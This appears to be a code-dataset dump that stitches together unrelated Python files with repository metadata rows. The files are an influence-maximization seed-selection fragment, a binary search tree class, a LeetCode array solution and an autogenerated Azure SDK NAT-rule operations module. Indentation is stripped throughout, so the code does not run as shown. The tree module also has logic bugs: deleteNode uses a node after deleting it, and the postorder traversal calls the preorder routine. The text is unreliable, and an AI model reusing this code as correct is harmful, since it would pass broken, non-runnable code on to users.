seed_cost_dict = ini.constructSeedCostDict()
graph_dict = ini.constructGraphDict()
product_list, epw_list = ini.constructProductList()
num_product = len(product_list)
total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
ssng_model = SeedSelectionNG(graph_dict, seed_cost_dict, product_list, epw_list, True)
sspmis_model = SeedSelectionPMIS(graph_dict, seed_cost_dict, product_list, epw_list)
ss_start_time = time.time()
celf_heap_o = sspmis_model.generateCelfHeap()
ss_acc_time = round(time.time() - ss_start_time, 4)
for now_b_iter in self.budget_iteration:
ss_start_time = time.time()
now_bi_index = self.budget_iteration.index(now_b_iter)
total_budget = safe_div(total_cost, 2 ** now_b_iter)
celf_heap = copy.deepcopy(celf_heap_o)
print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
'\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
# -- initialization for each sample --
now_budget, now_profit = 0.0, 0.0
seed_set = [set() for _ in range(num_product)]
s_matrix, c_matrix = [[set() for _ in range(num_product)]], [0.0]
while now_budget < total_budget and celf_heap:
mep_item = heap.heappop_max(celf_heap)
mep_mg, mep_k_prod, mep_i_node, mep_flag = mep_item
sc = seed_cost_dict[mep_i_node]
seed_set_length = sum(len(seed_set[k]) for k in range(num_product))
if round(now_budget + sc, 4) > total_budget:
continue
if mep_flag == seed_set_length:
seed_set[mep_k_prod].add(mep_i_node)
now_budget = round(now_budget + sc, 4)
now_profit = ssng_model.getSeedSetProfit(seed_set)
s_matrix.append(copy.deepcopy(seed_set))
c_matrix.append(now_budget)
else:
seed_set_t = copy.deepcopy(seed_set)
seed_set_t[mep_k_prod].add(mep_i_node)
ep_t = ssng_model.getSeedSetProfit(seed_set_t)
mg_t = round(ep_t - now_profit, 4)
flag_t = seed_set_length
if mg_t > 0:
celf_item_t = (mg_t, mep_k_prod, mep_i_node, flag_t)
heap.heappush_max(celf_heap, celf_item_t)
seed_set = sspmis_model.solveMCPK(total_budget, [s_matrix] * num_product, [c_matrix] * num_product)
now_budget = sum(seed_cost_dict[i] for k in range(num_product) for i in seed_set[k])
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
seed_set_sequence[now_bi_index] = seed_set
ss_time_sequence[now_bi_index] = ss_time
seed_data_sequence[now_bi_index] = seed_set
while -1 in seed_data_sequence:
no_data_index = seed_data_sequence.index(-1)
seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
for bi in self.budget_iteration:
now_bi_index = self.budget_iteration.index(bi)
if wallet_distribution_type_dict[self.wallet_key]:
eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
else:
for wd in self.wd_seq:
eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
def model_bcs(self):
ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
seed_cost_dict = ini.constructSeedCostDict()
graph_dict = ini.constructGraphDict()
product_list, epw_list = ini.constructProductList()
num_product = len(product_list)
total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
ssbcs_model = SeedSelectionBCS(graph_dict, seed_cost_dict, product_list, epw_list)
ss_start_time = time.time()
celf_heap_list_o = ssbcs_model.generateCelfHeap()
ss_acc_time = round(time.time() - ss_start_time, 4)
for now_b_iter in self.budget_iteration:
ss_start_time = time.time()
now_bi_index = self.budget_iteration.index(now_b_iter)
total_budget = safe_div(total_cost, 2 ** now_b_iter)
celf_heap_list = copy.deepcopy(celf_heap_list_o)
print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
'\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
seed_set_list = []
while celf_heap_list:
celf_heap = celf_heap_list.pop()
now_budget, now_profit = 0.0, 0.0
seed_set = [set() for _ in range(num_product)]
while now_budget < total_budget and celf_heap:
mep_item = heap.heappop_max(celf_heap)
mep_mg, mep_k_prod, mep_i_node, mep_flag = mep_item
sc = seed_cost_dict[mep_i_node]
seed_set_length = sum(len(seed_set[k]) for k in range(num_product))
if round(now_budget + sc, 4) > total_budget:
continue
if mep_flag == seed_set_length:
seed_set[mep_k_prod].add(mep_i_node)
now_budget = round(now_budget + sc, 4)
now_profit = round(now_profit + mep_mg * (sc if len(celf_heap_list) else 1.0), 4)
else:
seed_set_t = copy.deepcopy(seed_set)
seed_set_t[mep_k_prod].add(mep_i_node)
ep_t = ssbcs_model.getSeedSetProfit(seed_set_t)
mg_t = round(ep_t - now_profit, 4)
if len(celf_heap_list):
mg_t = safe_div(mg_t, sc)
flag_t = seed_set_length
if mg_t > 0:
celf_item_t = (mg_t, mep_k_prod, mep_i_node, flag_t)
heap.heappush_max(celf_heap, celf_item_t)
seed_set_list.insert(0, seed_set)
final_seed_set = copy.deepcopy(seed_set_list[0])
final_bud = sum(seed_cost_dict[i] for k in range(num_product) for i in final_seed_set[k])
final_ep = ssbcs_model.getSeedSetProfit(seed_set_list[0])
for k in range(num_product):
Handbill_counter = 0
AnnealingScheduleT, detT = 1000000, 1000
for s in seed_set_list[0][k]:
# -- first level: replace billboard seed by handbill seed --
final_seed_set_t = copy.deepcopy(final_seed_set)
final_seed_set_t[k].remove(s)
final_bud_t = final_bud - seed_cost_dict[s]
Handbill_seed_set = set((k, i) for k in range(num_product) for i in seed_set_list[1][k] if i not in final_seed_set_t[k])
if Handbill_seed_set:
min_Handbill_cost = min(seed_cost_dict[Handbill_item[1]] for Handbill_item in Handbill_seed_set)
while total_budget - final_bud_t >= min_Handbill_cost and Handbill_seed_set:
k_prod, i_node = Handbill_seed_set.pop()
if seed_cost_dict[i_node] <= total_budget - final_bud_t:
final_seed_set_t[k_prod].add(i_node)
final_bud_t += seed_cost_dict[i_node]
Handbill_counter += 1
final_ep_t = ssbcs_model.getSeedSetProfit(final_seed_set_t)
final_mg_t = final_ep_t - final_ep
# -- second level: replace handbill seed by handbill seed --
if final_mg_t >= 0 or math.exp(safe_div(final_mg_t, AnnealingScheduleT)) > random.random():
final_seed_set = final_seed_set_t
final_bud = final_bud_t
final_ep = final_ep_t
for q in range(min(Handbill_counter, 10)):
final_seed_set_t = copy.deepcopy(final_seed_set)
final_Handbill_seed_set = set((k, i) for k in range(num_product) for i in final_seed_set_t[k] if i in seed_set_list[1][k])
if final_Handbill_seed_set:
k_prod, i_node = final_Handbill_seed_set.pop()
final_seed_set_t[k_prod].remove(i_node)
final_bud_t = final_bud - seed_cost_dict[i_node]
Handbill_seed_set = set((k, i) for k in range(num_product) for i in seed_set_list[1][k] if i not in final_seed_set_t[k])
min_Handbill_cost = min(seed_cost_dict[Handbill_item[1]] for Handbill_item in Handbill_seed_set)
while total_budget - final_bud_t >= min_Handbill_cost and Handbill_seed_set:
k_prod, i_node = Handbill_seed_set.pop()
if seed_cost_dict[i_node] <= total_budget - final_bud_t:
final_seed_set_t[k_prod].add(i_node)
final_bud_t += seed_cost_dict[i_node]
final_ep_t = ssbcs_model.getSeedSetProfit(final_seed_set_t)
final_mg_t = final_ep_t - final_ep
if final_mg_t >= 0 or math.exp(safe_div(final_mg_t, AnnealingScheduleT)) > random.random():
final_seed_set = final_seed_set_t
final_bud = final_bud_t
final_ep = final_ep_t
AnnealingScheduleT -= detT
seed_set = copy.deepcopy(final_seed_set)
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(final_bud) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
seed_set_sequence[now_bi_index] = seed_set
ss_time_sequence[now_bi_index] = ss_time
seed_data_sequence[now_bi_index] = final_seed_set
while -1 in seed_data_sequence:
no_data_index = seed_data_sequence.index(-1)
seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
for bi in self.budget_iteration:
now_bi_index = self.budget_iteration.index(bi)
if wallet_distribution_type_dict[self.wallet_key]:
eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
else:
for wd in self.wd_seq:
eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index]) | [
"[email protected]"
] | |
b1a541ae2823325189c5b0f803ec117c9df66d07 | de69d99db8be567d97060149481091c25907d4ef | /src/trees/binary_trees.py | 84f2bcde422555256b4619c0ba4e877f5b7f152d | [] | no_license | chalam/Pynaconda | 0dd5acdb19c38352ee5d4b92c002d05bd75e452d | e24600d26afbc685e3853a6037f50dfc3fe077d2 | refs/heads/master | 2021-01-10T13:37:54.811250 | 2018-10-13T20:48:44 | 2018-10-13T20:48:44 | 36,340,529 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,556 | py | class Node:
"""
Class Node
"""
def __init__(self, value):
self.left = None # No self-referential Node in python
self.data = value
self.right = None
class Tree:
"""
Class tree will provide a tree as well as utility functions.
"""
def createNode(self, data):
"""
Utility function to create a node.
"""
return Node(data)
def insert(self, node, data):
"""
Insert function will insert a node into tree.
Duplicate keys are not allowed.
"""
# if tree is empty , return a root node
if node is None:
return self.createNode(data)
# if data is smaller than parent , insert it into left side
if data < node.data:
node.left = self.insert(node.left, data)
elif data > node.data:
node.right = self.insert(node.right, data)
return node
def search(self, node, data):
"""
Search function will search a node into tree.
"""
# if root is None or root is the search data.
if node is None or node.data == data:
return node
if node.data < data:
return self.search(node.right, data)
else:
return self.search(node.left, data)
def deleteNode(self, node, data):
"""
Delete function will delete a node into tree.
Not complete , may need some more scenarion that we can handle
Now it is handling only leaf.
"""
# Check if tree is empty.
if node is None:
return None
# searching key into BST.
if data < node.data:
node.left = self.deleteNode(node.left, data)
elif data > node.data:
node.right = self.deleteNode(node.right, data)
else: # reach to the node that need to delete from BST.
if node.left is None and node.right is None:
del node
if node.left == None:
temp = node.right
del node
return temp
elif node.right == None:
temp = node.left
del node
return temp
return node
def traverseInorder(self, root):
"""
traverse function will print all the node in the tree.
"""
if root is not None:
self.traverseInorder(root.left)
print(root.data)
self.traverseInorder(root.right)
def traversePreorder(self, root):
"""
traverse function will print all the node in the tree.
"""
if root is not None:
print(root.data)
self.traversePreorder(root.left)
self.traversePreorder(root.right)
def traversePostorder(self, root):
"""
traverse function will print all the node in the tree.
"""
if root is not None:
self.traversePreorder(root.left)
self.traversePreorder(root.right)
print(root.data)
def main():
root = None
tree = Tree()
root = tree.insert(root, 10)
print(root)
tree.insert(root, 20)
tree.insert(root, 30)
tree.insert(root, 40)
tree.insert(root, 70)
tree.insert(root, 60)
tree.insert(root, 80)
print("Traverse Inorder")
tree.traverseInorder(root)
print("Traverse Preorder")
tree.traversePreorder(root)
print("Traverse Postorder")
tree.traversePostorder(root)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
c9d62cd28eb6a98c113b079864bf0553c983be35 | 284f4f56aed56573eb5516aa67c99bf41e595522 | /Leetcode/Arrays/p3574.py | 4261a42c73d1469fdff5a35d33f807e57238da87 | [] | no_license | rohangoli/PythonAdvanced | 537a05eff9ec305a6ec32fa2d0962a64976cd097 | 6448a5f0d82c7e951b5e476638e15a3c34966cd9 | refs/heads/develop | 2023-07-20T04:33:50.764104 | 2023-07-14T04:04:18 | 2023-07-14T04:04:18 | 126,811,520 | 0 | 0 | null | 2022-06-10T23:07:10 | 2018-03-26T10:20:16 | Jupyter Notebook | UTF-8 | Python | false | false | 514 | py | ## Squares of a Sorted Array
# Example 1:
# Input: nums = [-4,-1,0,3,10]
# Output: [0,1,9,16,100]
# Explanation: After squaring, the array becomes [16,1,0,9,100].
# After sorting, it becomes [0,1,9,16,100].
# Example 2:
# Input: nums = [-7,-3,2,3,11]
# Output: [4,9,9,49,121]
class Solution:
def sortedSquares(self, nums: List[int]) -> List[int]:
N=len(nums)
i=0
while i<N:
nums[i]=nums[i]**2
i+=1
nums.sort()
return nums | [
"[email protected]"
] | |
cf12b9fec72682fc2aa7ad9307da65aab512a315 | 78d35bb7876a3460d4398e1cb3554b06e36c720a | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2021_02_01/operations/_virtual_network_gateway_nat_rules_operations.py | 8cc37a0f84e06af9a668517eea78cd7432103909 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | catchsrinivas/azure-sdk-for-python | e35f59b60318a31b3c940a7a3a07b61b28118aa5 | 596227a7738a5342274486e30489239d539b11d1 | refs/heads/main | 2023-08-27T09:08:07.986249 | 2021-11-11T11:13:35 | 2021-11-11T11:13:35 | 427,045,896 | 0 | 0 | MIT | 2021-11-11T15:14:31 | 2021-11-11T15:14:31 | null | UTF-8 | Python | false | false | 22,954 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualNetworkGatewayNatRulesOperations(object):
"""VirtualNetworkGatewayNatRulesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2021_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
resource_group_name, # type: str
virtual_network_gateway_name, # type: str
nat_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualNetworkGatewayNatRule"
"""Retrieves the details of a nat rule.
:param resource_group_name: The resource group name of the Virtual Network Gateway.
:type resource_group_name: str
:param virtual_network_gateway_name: The name of the gateway.
:type virtual_network_gateway_name: str
:param nat_rule_name: The name of the nat rule.
:type nat_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualNetworkGatewayNatRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2021_02_01.models.VirtualNetworkGatewayNatRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkGatewayNatRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-02-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualNetworkGatewayNatRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_network_gateway_name, # type: str
nat_rule_name, # type: str
nat_rule_parameters, # type: "_models.VirtualNetworkGatewayNatRule"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualNetworkGatewayNatRule"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkGatewayNatRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(nat_rule_parameters, 'VirtualNetworkGatewayNatRule')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetworkGatewayNatRule', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualNetworkGatewayNatRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_network_gateway_name, # type: str
nat_rule_name, # type: str
nat_rule_parameters, # type: "_models.VirtualNetworkGatewayNatRule"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualNetworkGatewayNatRule"]
"""Creates a nat rule to a scalable virtual network gateway if it doesn't exist else updates the
existing nat rules.
:param resource_group_name: The resource group name of the Virtual Network Gateway.
:type resource_group_name: str
:param virtual_network_gateway_name: The name of the gateway.
:type virtual_network_gateway_name: str
:param nat_rule_name: The name of the nat rule.
:type nat_rule_name: str
:param nat_rule_parameters: Parameters supplied to create or Update a Nat Rule.
:type nat_rule_parameters: ~azure.mgmt.network.v2021_02_01.models.VirtualNetworkGatewayNatRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualNetworkGatewayNatRule or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2021_02_01.models.VirtualNetworkGatewayNatRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkGatewayNatRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_name=virtual_network_gateway_name,
nat_rule_name=nat_rule_name,
nat_rule_parameters=nat_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualNetworkGatewayNatRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
virtual_network_gateway_name, # type: str
nat_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-02-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_network_gateway_name, # type: str
nat_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes a nat rule.
:param resource_group_name: The resource group name of the Virtual Network Gateway.
:type resource_group_name: str
:param virtual_network_gateway_name: The name of the gateway.
:type virtual_network_gateway_name: str
:param nat_rule_name: The name of the nat rule.
:type nat_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_name=virtual_network_gateway_name,
nat_rule_name=nat_rule_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
'natRuleName': self._serialize.url("nat_rule_name", nat_rule_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules/{natRuleName}'} # type: ignore
def list_by_virtual_network_gateway(
self,
resource_group_name, # type: str
virtual_network_gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ListVirtualNetworkGatewayNatRulesResult"]
"""Retrieves all nat rules for a particular virtual network gateway.
:param resource_group_name: The resource group name of the virtual network gateway.
:type resource_group_name: str
:param virtual_network_gateway_name: The name of the gateway.
:type virtual_network_gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVirtualNetworkGatewayNatRulesResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2021_02_01.models.ListVirtualNetworkGatewayNatRulesResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVirtualNetworkGatewayNatRulesResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_virtual_network_gateway.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayName': self._serialize.url("virtual_network_gateway_name", virtual_network_gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ListVirtualNetworkGatewayNatRulesResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_virtual_network_gateway.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/natRules'} # type: ignore
